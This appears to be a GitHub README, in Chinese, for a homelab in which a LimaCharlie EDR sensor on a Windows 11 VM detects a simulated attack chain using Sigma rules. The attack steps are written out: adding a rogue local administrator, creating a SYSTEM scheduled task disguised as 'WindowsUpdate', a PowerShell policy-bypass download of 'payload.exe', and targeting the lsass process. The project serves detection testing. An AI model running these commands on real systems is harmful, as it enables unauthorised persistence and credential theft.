gaurav-koshti-CySA/EDR-limacharlie-homelab
GitHub: gaurav-koshti-CySA/EDR-limacharlie-homelab
在VirtualBox家庭实验室中部署LimaCharlie EDR,模拟完整攻击链并使用Sigma规则进行威胁检测的实践项目。
Stars: 0 | Forks: 0
# EDR-limacharlie-homelab
LimaCharlie EDR 部署、攻击模拟与威胁检测(Windows 11 Pro)—— 在 Wazuh + Nessus 家庭实验环境中实现完整的攻击链,涵盖发现(Discovery)、持久化(Persistence)、凭证访问(Credential Access)和命令与控制(C2),并使用 Sigma 规则进行检测。
## 实验环境
| 虚拟机 | IP | 角色 |
|---|---|---|
| Kali Linux | 10.0.2.5 | Wazuh Manager 4.7.5(Indexer + Manager + Dashboard) |
| Windows Server 2019 | 10.0.2.15 | Wazuh Agent + Sysmon + Nessus Essentials 扫描器 |
| Windows 11 Pro | 10.0.2.122 | Wazuh Agent + Sysmon + LimaCharlie EDR Sensor |
所有虚拟机运行在 Oracle VirtualBox 的 NAT 网络 LabNetwork(10.0.2.0/24)上。
## 什么是 LimaCharlie?
LimaCharlie 是一个云原生安全运营平台,提供实时 EDR 功能。它使分析师能够完全了解端点遥测数据,包括进程创建、网络连接、文件系统活动和注册表变更,这些数据会实时流式传输到云控制台。
## 实验目标
- 在实时 Windows 11 Pro 端点上部署 LimaCharlie 传感器
- 启用基于 Sigma 的检测规则集(ext-sigma)
- 模拟真实的多阶段攻击链
- 生成并分析映射到 MITRE ATT&CK 的检测结果
- 验证 EDR 遥测数据与现有 Wazuh SIEM 覆盖范围的结合
## 部署
### 步骤 1 - 创建 LimaCharlie 组织
- 在 app.limacharlie.io 注册
- 创建组织:GK-SOC-Homelab(区域:加拿大)
### 步骤 2 - 生成安装密钥
- 导航到 Sensors > Installation Keys
- 创建密钥:Win11-Pro-10.0.2.122
### 步骤 3 - 在 Windows 11 Pro 上安装传感器
cd C:\Users\admin\Downloads
hcp_win_x64.exe -i
### 步骤 4 - 验证部署
确认 win11-endpoint 在 60 秒内以绿色 Online 状态出现在 LimaCharlie Sensors List 中。
### 步骤 5 - 启用检测规则
- 订阅 ext-sigma:Core Sigma 规则(MITRE ATT&CK 映射,免费)
## 攻击模拟与检测
### 阶段 1 - 发现(Discovery)
whoami /all & net user & net localgroup administrators
| 检测规则 | MITRE ATT&CK 技术 |
|---|---|
| 可疑的组和账户侦察活动(使用 Net.EXE) | T1069 |
| 本地账户发现 | T1087.001 |
| 使用 Whoami.EXE 枚举所有信息 | T1033 |
### 阶段 2 - 持久化(Persistence)
net user hacker P@ssword123 /add & net localgroup administrators hacker /add
schtasks /create /tn "WindowsUpdate" /tr "cmd.exe /c whoami" /sc onlogon /ru system
| 检测规则 | MITRE ATT&CK 技术 |
|---|---|
| 通过 Net.EXE 创建新用户 | T1136.001 |
| 用户被添加到本地管理员组 | T1098 |
| 通过 Schtasks.EXE 创建计划任务 | T1053.005 |
| 使用高权限的可疑 Schtasks 计划类型 | T1053.005 |
### 阶段 3 - 命令与控制(Command and Control)
powershell -ExecutionPolicy Bypass -NoProfile -Command "Invoke-WebRequest -Uri http://example.com -OutFile C:\Temp\payload.exe"
| 检测规则 | MITRE ATT&CK 技术 |
|---|---|
| 00048-WIN-Powershell_Invoke-WebRequest_Usage | T1105 |
| Web 请求命令和 cmdlet 的使用 | T1105 |
| 将 PowerShell 策略更改为不安全级别 | T1059.001 |
| 可疑的 Invoke-WebRequest 执行 | T1105 |
| 派生的非交互式 PowerShell 进程 | T1059.001 |
### 阶段 4 - 凭证访问(Credential Access)
powershell -nop -exec bypass -c "Get-Process lsass"
| 检测规则 | MITRE ATT&CK 技术 |
|---|---|
| PowerShell Get-Process LSASS | T1003.001 |
| 可疑的 PowerShell 参数子字符串 | T1059.001 |
| 派生的非交互式 PowerShell 进程 | T1059.001 |
## MITRE ATT&CK 覆盖范围摘要
| 战术 | 技术 | ID |
|---|---|---|
| Discovery | 账户发现:本地账户 | T1087.001 |
| Discovery | 系统所有者/用户发现 | T1033 |
| Discovery | 权限组发现 | T1069 |
| Persistence | 创建账户:本地账户 | T1136.001 |
| Persistence | 账户操作 | T1098 |
| Persistence | 计划任务/作业 | T1053.005 |
| Command and Control | 入口工具传输 | T1105 |
| Execution | PowerShell | T1059.001 |
| Credential Access | 操作系统凭证转储:LSASS 内存 | T1003.001 |
## 清理
net user hacker /delete & schtasks /delete /tn "WindowsUpdate" /f
## 关键要点
- LimaCharlie 配合 Sigma 规则成功检测到模拟的所有 4 个 MITRE 战术的攻击技术
- EDR 遥测数据提供了 SIEM 日志收集无法捕获的进程级细节
- 免费 ext-sigma 规则集提供了企业级检测覆盖,零成本
- 在同一端点上同时运行 EDR 和 Wazuh SIEM 展示了真实的多工具 SOC 可视化能力
## 相关实验
- [Wazuh SIEM 实验环境](https://github.com/gaurav-koshti-CySA/Wazuh_SIEM_Lab)
- [Nessus 漏洞管理实验环境](https://github.com/gaurav-koshti-CySA/Nessus_Vuln_Management_Lab)
- [事件响应实验环境](https://github.com/gaurav-koshti-CySA/-Incident-Response-lab)
- [Entra IAM 实验环境](https://github.com/gaurav-koshti-CySA/Entra_Iam_Lab)
标签:AMSI绕过, Cloudflare, EDR, HTTP工具, IP 地址批量处理, LimaCharlie, MITRE ATT&CK, Nessus, PE 加载器, Sigma规则, Sysmon, Wazuh, Windows 11, 威胁情报, 威胁检测, 安全运营, 家庭实验室, 开发者工具, 扫描框架, 攻击模拟, 数据展示, 无线安全, 目标导入, 端点安全, 红队, 网络安全审计, 网络攻防, 脆弱性评估, 补丁管理, 速率限制, 驱动签名利用